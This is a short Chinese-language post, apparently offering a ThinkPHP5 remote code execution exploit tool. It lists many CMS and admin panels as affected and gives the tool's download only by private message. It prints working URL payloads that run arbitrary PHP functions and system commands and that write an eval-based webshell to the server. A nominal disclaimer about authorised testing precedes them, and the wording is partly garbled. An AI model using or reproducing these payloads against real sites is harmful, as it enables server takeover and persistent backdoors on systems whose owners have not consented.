该工具只能授权验证网站漏洞和站长验证漏洞利用。
禁止用于未授权测试,造孽入侵,否则统统后果自大,和作者无关。
影响范围

以下基于ThinkPHP5 二次开拓的内容管理系统,很可能受到该漏洞影响,建议厂商及时更新。
AdminLTE后台管理系统layui后台管理系统thinkcmfH-ui.admin后台管理系统tpshopFsatAdmineyoucmsLarryCMS后台管理系统tpadmin后台管理系统snake后台管理系统ThinkSNSDolphinPHP后台管理系统WeMall商城系统CLTPHP齐博CMSDSMALLYFCMFHisiPHP后台管理系统Tplay后台管理系统lyadmin后台管理系统haoid后台管理系统漏洞验证
命令实行
getshell
下载地址:私信我关键字“getshell”自动获取下载链接
附上测试代码
#代码实行?s=index/\think\Request/input&filter=phpinfo&data=1#命令实行?s=index/\think\Request/input&filter=system&data=系统命令#getshell?s=index/\think\template\driver\file/write&cacheFile=paylog.php&content=%3C?php%20eval($_POST[20208]);?%3Ehacker#getshell2?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E#代码实行?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1#命令实行?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=系统命令#代码实行?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1#命令实行?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=系统命令